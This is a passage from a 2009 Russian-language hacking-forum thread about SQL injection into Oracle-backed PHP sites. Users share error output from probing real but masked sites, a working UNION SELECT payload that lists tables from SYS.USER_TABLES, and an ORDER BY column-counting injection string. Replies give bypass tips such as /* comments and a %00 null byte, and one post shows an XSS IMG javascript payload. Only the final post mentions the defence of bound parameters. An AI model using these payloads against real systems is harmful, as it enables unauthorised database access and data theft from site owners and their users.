ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 11.02.2009, 11:54
Аватар для aqqa
aqqa
Banned
Регистрация: 12.07.2008
Сообщений: 206
Провел на форуме:
801258

Репутация: 33
Отправить сообщение для aqqa с помощью ICQ
По умолчанию

Напоролся на такую шнягу,подскажите как дальше
Warning: oci_execute() [function.oci-execute]: ORA-01460: unimplemented or unreasonable conversion requested in /usr/local/apache2/htdocs/cms_adm/lib/site/Oracle.class.php on line 86
array (
0 => '"> http://******.ru/trye.asp?sessionID="><IMG%20SRC="javascript:alert( );',
1 => '',
)
 
Ответить с цитированием

  #32  
Старый 11.02.2009, 12:31
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Интересный факт, не знаю на сколько будет полезно но: запрос

www.site.com/view.php?id=-1+union+select+null, table_name, null, null+from+sys.user_tables+where+rownum+<=+5--

выдавал пустую страничкy, а запрос

www.site.com/view.php?id=-1+UNION+SELECT+null, TABLE_Name, null, null+FROM+SYS.USER_TABLES+WHERE+ROWNUM+<=+5--

выводил нужную информацию на страничкy

З.Ы. Спасибо за предоставленую инфу по ораклу...
 
Ответить с цитированием

  #33  
Старый 01.04.2009, 01:02
Аватар для navigat0r
navigat0r
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739

Репутация: 146
Отправить сообщение для navigat0r с помощью ICQ
Question

eсть вот такая вещь, как с ней бороться??Как подобрать кол-во столбцов?
BD Oracle
получил с помощбю post запроса www.site.ru/vote/statistic.php?lang=kaz&vote=1&question_id=1122031291')--+&answer_id=1122031391&vote_bt.x=21&vote_bt.y=11


Warning: ociexecute() [function.ociexecute]: ORA-01785: ORDER BY item must be the number of a SELECT-list expression in /export/htdocs/oracle.php on line 48
SELECT * FROM voting_questions WHERE id = '1122031291\' order by 99999--'
Warning: ocifetchinto() [function.ocifetchinto]: ORA-24374: define not done before fetch or execute and fetch in /export/htdocs/oracle.php on line 56

буду ОЧЕНЬ признателен за помощь!
 
Ответить с цитированием

  #34  
Старый 04.04.2009, 12:16
Аватар для navigat0r
navigat0r
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739

Репутация: 146
Отправить сообщение для navigat0r с помощью ICQ
По умолчанию

это вообще за инъекцию сойдёт???Как можно подобрать кол-во колонок?
 
Ответить с цитированием

  #35  
Старый 04.04.2009, 16:03
Аватар для HIVER
HIVER
Познающий
Регистрация: 28.10.2008
Сообщений: 43
Провел на форуме:
117557

Репутация: 125
По умолчанию

У тебя комментирование "--" запроса не прошло. Скул говорит, что "group by 99999--" - должно быть целым числом, а не с "--". Попробуй "/*" и нулл-байт %00, мало ли.
 
Ответить с цитированием

  #36  
Старый 18.10.2009, 09:13
Аватар для (Dm)
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131

Репутация: 1695
По умолчанию

Вообще, я удивлен, наличием php скриптов с sql инъекцией под оракл... нужно сильно постараться написать такой код, когда есть функция OCIBindByName, использование которой сводит возможность инъекции на нет.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ